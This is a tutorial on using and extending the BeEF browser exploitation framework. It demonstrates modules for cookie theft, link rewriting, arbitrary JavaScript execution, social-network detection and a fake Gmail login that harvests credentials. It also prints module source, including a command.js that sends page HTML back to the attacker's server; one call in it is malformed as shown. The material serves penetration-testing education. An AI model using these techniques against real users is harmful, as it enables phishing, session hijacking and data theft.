The Browser Exploitation Framework (BeEF) – Part 2

The first article in this series can be found here: The Browser Exploitation Framework (BeEF) – Part 1. 1. Using the Modules

In this section we'll describe all the available modules in the current version of the BeEF exploitation framework. We'll describe the most interesting modules available. All the examples in this part of the BeEF article are presented based upon the two examples presented in the previous article: part1.

  1. Get Cookie:

Retrieve the session cookie of the current web page. In the picture below we can see the actual cookie the web page uses:

image0

When we execute the "Get Cookie" module, we get the response in the picture below:

image1

We can observe that the cookie BEEFHOOK is the same, therefore we've successfully got the cookie.

  1. Get Page HREFs

This module will retrieve HREFS from the target page. If we take a look at the source code of the web page in question, we can see the below code:

<ul>
<li><a href="http://beefproject.com" target="_blank">The Browser
Exploitation Framework Project homepage</a></li>
<li><a href="http://ha.ckers.org/" target="_blank">ha.ckers.org
homepage</a></li>
<li><a href="http://slashdot.org/" target="_blank">Slashdot</a></li>
</ul>
<pre>

There are three links in the HTML code:

With this module we can extract the links from the web page. If we execute the module "Get Page HREFs" we'll get the response as presented in the picture below:

image2

We can see that the result of the command contains the same links as we already pointed out.

  1. Get Page HTML

This module retrieves the HTML from the current page. The response of the execution of this module is presented in the picture below:

image3

  1. Replace HREFs

This module will rewrite all the HREF attributes with the specified URL. Let's execute the module with the specified URL of www.google.com. This successfully overwrites all the links in the targeted web page. The successful response can be seen in the picture below:

image4

If we hover the links in the web browser after we've executed this module, we can see that all links point to the URL www.google.com, which is what the module did.

  1. Create Alert Dialog

This is the first module that is not invisible to the user. This module sends an alert dialog to the hooked browser. We specified "Hello!" as the alert text and executed the module. The hooked web browser displayed what can be seen in the picture below:

image5

The alert dialog was shown correctly.

  1. Google Search

This module searched Google from the hooked browser. A successful search query is presented in the picture below:

image6

  1. Raw JavaScript

This module sends the JavaScript code entered in the input field to be executed in the hooked browser. Code is run inside an anonymous function and the return value is passed to the framework.

If we input the alert("Hello World!"); return 'Ok'; into the input field, the hooked browser will display an alert window like in the picture below:

image7

We can see that our JavaScript was successfully executed.

  1. Detect Social Networks

This module will detect if the hooked browser is currently connected in any of the social networks listed here: Gmail, Facebook or Twitter. The response when the user is authenticated into the Facebook social network is presented in the picture below:

image8

  1. Google Phishing

This module will fake the Google login web page. Upon logging into the Gmail mail system, the user credentials will be send back to the BeEF framework. When we click on the execute button, the Gmail Google web page will appear, as shown below:

image9

We can see that the web page looks exactly like the Gmail login web page, except the URL is different. Upon entering the username and password test:test, we'll receive the response into the BeEF framework which will hold the inputted username and password:

image10

We can see that we've successfully gathered the inputted credentials of the users.

2. Inner Workings of a Module

The module source code files are located in directory /beef/modules/browser/hooked_domain/get_page_html/. This directory holds the file module.rb looks like below:

class Get_page_html < BeEF::Core::Command

def post_execute

content = {}

content['head'] = @datastore['head']

content['body'] = @datastore['body']

save content

end

end

We're creating a new class Get_page_html, which inherits from BeEF::Core::Command class. There are also two other files in this directory. The first file is config.yaml, which is represented below, and contains the configuration variables of the module:

beef:

module:

get_page_html:

enable: true

category: ["Browser", "Hooked Domain"]

name: "Get Page HTML"

description: "This module will retrieve the HTML from the current page."

authors: ["bcoles"]

target:

working: ["ALL"]

We can see that the module is called get_page_html, it's under the category "Browser – Hooked Domain" and works in all target web browsers. The second file is command.js, represented below:

beef.execute(function() {

try {

var html_head = document.head.innerHTML.toString();

} catch (e) {

var html_head = "Error: document has no head";

}

try {

var html_body = document.body.innerHTML.toString();

} catch (e) {

var html_body = "Error: document has no body";

}

beef.net.send("", , 'head='+html_head+'&body='+html_body);

});

This is the code that gets sent to the hooked web browser to be executed. When the code is executed, the beef.net.send function call is used to send back the results of the executed actions.

The core.rb file contains:

module BeEF

module Core

end

end

# @note Includes database models - the order must be consistent
otherwise DataMapper goes crazy

require 'core/main/models/user'

require 'core/main/models/commandmodule'

require 'core/main/models/hookedbrowser'

require 'core/main/models/log'

require 'core/main/models/command'

require 'core/main/models/result'

require 'core/main/models/optioncache'

require 'core/main/models/browserdetails'

# @note Include the constants

require 'core/main/constants/browsers'

require 'core/main/constants/commandmodule'

require 'core/main/constants/distributedengine'

require 'core/main/constants/os'

require 'core/main/constants/hardware'

# @note Include core modules for beef

require 'core/main/configuration'

require 'core/main/command'

require 'core/main/crypto'

require 'core/main/logger'

require 'core/main/migration'

# @note Include the command line parser and the banner printer

require 'core/main/console/commandline'

require 'core/main/console/banners'

Each module inherits from core/main/command, which is presented below:

# @note This class is the base class for all command modules in the
framework.

# Two instances of this object are created during the execution of
command module.

class Command

attr_reader :datastore, :path, :default_command_url,
:beefjs_components, :friendlyname

attr_accessor :zombie, :command_id, :session_id

include BeEF::Core::CommandUtils

include BeEF::Core::Constants::Browsers

include BeEF::Core::Constants::CommandModule

end

The class Command also contains various functions:

  • initialize: class constructor
  • pre_send: called before the instructions are sent to hooked browser
  • callback: called when the hooked browser sends back results
  • process_zombie_response: process the rest of the results
  • needs_configuration: returns true if the command needs configurations to work
  • to_json: returns information about the command in JSON format
  • build_datastore: builds the datastore attribute of the command that is used to generate javascript
  • build_callback_datastore: sets the datastore of the callback function
  • output: the actual instructions sent to the browser
  • save: saves the result received by the browser
  • use: load a specific module that the command will be using

There are some other functions that we don't need to know about: map_file_to_url, oc_value and apply_defaults. Therefore in order to create a new module, we need to do the following things:

  1. command.js

This file needs to implement the beef.execute function that contains the Javascript sent to the hooked browser to be executed:

beef.execute(function() {

/* code here */

});
  1. config.yaml

This file contains the configuration variables for current module. The basic file structure is like below:

beef:

module:

[module_name]:

enable: true

category: [category]

name: [name]

description: [description]

authors: [author]

target:

user_notify: ['ALL']
  1. module.rb

This file contains the actual code of the module. Here we must create a new class that inherits BeEF::Core::Command and performs the actions we want. The basic skeleton file should is below:

class [module_name] < BeEF::Core::Command

; code

end

3. Conclusion

We've seen how the modules of a BeEF framework can be used to execute the desired actions. We've also looked at how the modules are built and described the process necessary to build your own module.

Comments